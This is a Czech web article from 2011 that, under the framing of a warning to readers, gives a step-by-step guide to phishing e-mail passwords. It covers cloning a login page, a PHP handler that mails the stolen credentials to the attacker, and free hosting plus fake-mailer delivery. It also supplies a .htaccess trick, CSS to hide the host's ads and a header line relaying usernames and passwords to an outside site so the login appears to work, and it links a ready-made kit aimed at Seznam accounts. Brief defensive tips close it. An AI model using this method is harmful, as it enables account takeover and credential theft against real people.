Hacknutí hesla na e-mail - sociotechnika || na co dávat pozor?

Pomůžete mi hacknout heslo na email? Častá otázka s kterou se setkávám častěji a častěji, přiblížením jednoho z mnoha způsobů "hacknutí" e-mailu bych rád ukázal na jednoduchost a tím vás varoval na chyby, které mnozí z vás dělají. Popíšem si útok sociotechnika...

Aktualizováno 11.12.2011

"Jen dvě věci na světě jsou nekonečné...Vesmír a lidská hloupost...Tím prvním si ovšem nejsem jist..." Albert Einstein

Budem brát v úvahu, že útočník si vezme prohlášení pana Alberta jako radu a hlouposti lidí (hlouposti vaší) využije. Útok na váš email tedy může probíhat takto: kliknete na odkaz, zobrazí se výzva k přihlášení, přihlásíte se a čtete obsah stránek. VAŠE HESLO BYLO PROZRAZENO!

Hesla typu "Q.q!SaW_2" jsou zbytečná!

Co útočníkovi stačí:

• stažená přihlašovací stránka (poslouží k vytvoření fake kopie)
• šikovně zvolená doména (klidně i druhého řádu, ovšem přesvědčivost klesá)
• základní znalost php a html (bo bezmyšlenkové stažení níže uvedených kodů :o) lol)
• šikovnost a využití vaší hlouposti

Jak bude postupovat:

• jde na přihlašovací stránku a stáhne ji podobně jako na obrázku
  
  
• vytvoří si soubor například post.php a do něj vloží script, který zpracuje přijaté informace z kopie a odešle je například na email, script může vypadat třebas takto - zde
• otevře si zdrojový kod stažené stránky s loginem a upraví hodnotu atributu action="neco" na action="post.php" viz. obrázek
  
  
• nyní má post.php, složku souborů která vznikla stažením přihlašovací stránky a samotnou přihlašovací stránku
• přihlásí se na svůj hosting (například na wz.cz ) a soubory tam uploaduje
• nyní když zadá adresu která mu tímto vznikne www.jehohosting.cz/prihlasovacistranka.htm načte se klasické přihlášení, s tím rozdílem že zadaná hesla odesílá na email a poté přesměrovává na originální stránku...
• takový odkaz pak může poslat pomocí fake maileru nebo icq

Pár tipů

Umístěním .htaccess s tímto řádkem (umístění musí být v adresáři s login.html) docílíte zobrazení stránky i při "špatně zadané" url. Využití může být pro modifikaci url k zvýšení důvěryhodnosti.

ErrorDocument 404 /login.html

Dále třeba zobrazení reklamy na freehostingu může být nepříjemná věc, stránka pak na první pohled není reálná. Porušení pravidel freehostingů, ale skrytí reklamy dosáhnete umístěním reklamy do tagů div a pomocí css nastavíte display: none. Příklad:

<div style="display: none;"><!--reklama--></div>

Pokud chcete aby bylo přihlašování na fake webu funkční, můžete využít projektu GET2POST a v souboru send.php namísto přesměrování zaslat správné údaje ke skutečnému zpracování. V ukazkových souborech stačí nahradit řádek začínající header tímto:

header("location: http://www.soom.cz/projects/get2post/resend.php?username=".$user."&password=".$pass."&
login=p%C5%99ihl%C3%A1sit+se&serviceid=email&disablessl=0&forcessl=0&lang=cz&logintype=seznam&
returnurl=http%3A%2F%2Femail.seznam.cz%2Fticket&forcerelogin=0&coid=
&uri=https%3A%2F%2Flogin.szn.cz%2FloginProcess&domain=".$dom);

Jak se bránit? Stačí dodržovat tyto zásady:

• neklikejte na odkazy příchozí z neznámých adres a čísel
• neklikejte na odkazy které mají podivnou url
• zbystřete jestliže po vás odkaz vyžaduje heslo
• čtěte url a uvažujte
• pozor! nepřihlašujte se na veřejných terminálech (přesměrování například pomoci FuckDNS)

Odkazy

Testovací balík s připravenými soubory pro hesla seznamu (obsahuje v post.php řádek, starající se o informování napadeného uživatele!): zde

Vše slouží k prostudování hrozby přicházející z této strany, vaše počínání jde mimo mou osobu a veškerou odpovědnost tím berete na sebe! Zneužití je trestné!

Autor: KdoSiOdJinud / Jan Kuthan Vydáno: 11.12.2011 11:22 Přečteno: 69797x

Vypracované maturitní otázky z literatury Jak změnit MAC adresu? Blesk: Naše škola - nastavení zabezpečených sítí Školu vidím růžově!